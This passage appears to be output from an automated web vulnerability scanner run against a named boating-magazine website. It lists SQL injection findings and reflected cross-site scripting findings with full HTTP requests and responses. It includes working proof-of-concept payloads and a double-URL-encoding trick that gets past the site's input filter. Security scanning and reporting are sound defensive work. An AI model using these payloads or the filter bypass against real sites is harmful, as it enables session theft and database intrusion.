P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.65. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 74 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 755fe"><script>alert(1)</script>b97b88a4df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about-us?755fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb97b88a4df6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/about-us?755fe"><script>alert(1)</script>b97b88a4df6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.2. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3409"><script>alert(1)</script>2e24591c134 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /advertise?a3409%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e24591c134=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/advertise?a3409"><script>alert(1)</script>2e24591c134=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.3. http://www.soundingsonline.com/archives ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The value of the '"--></style></script><script>alert(0x001E2B)</script> request parameter is copied into the HTML document as plain text between tags. The payload c4e94<a>353682fa55e was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>c4e94<a>353682fa55e HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=jfj578l38bjt9jl82m4g7tr920; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:28:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>c4e94<a>353682fa55e' AND co' at line 1</font>
...[SNIP]...

2.4. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9a4f6<a>1bd7300bcc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>&9a4f6<a>1bd7300bcc0=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=0mofbqpbltb8gduh5me9ne6ql3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:29:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</script>&9a4f6<a>1bd7300bcc0=1' AND' at line 1</font>
...[SNIP]...

2.5. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa446"><script>alert(1)</script>bb3bb3a680e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop?aa446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb3bb3a680e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop?aa446"><script>alert(1)</script>bb3bb3a680e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.6. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 777a1"><script>alert(1)</script>1d991553d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/know-how?777a1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d991553d87=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/know-how?777a1"><script>alert(1)</script>1d991553d87=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.7. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1582c"><script>alert(1)</script>430c4650db4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-boats?1582c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e430c4650db4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-boats?1582c"><script>alert(1)</script>430c4650db4=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.8. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1f05"><script>alert(1)</script>10548a0b938 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/new-gear?e1f05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e10548a0b938=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/new-gear?e1f05"><script>alert(1)</script>10548a0b938=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.9. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92b7d"><script>alert(1)</script>e206520e3f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/on-powerboats?92b7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee206520e3f2=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:33:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
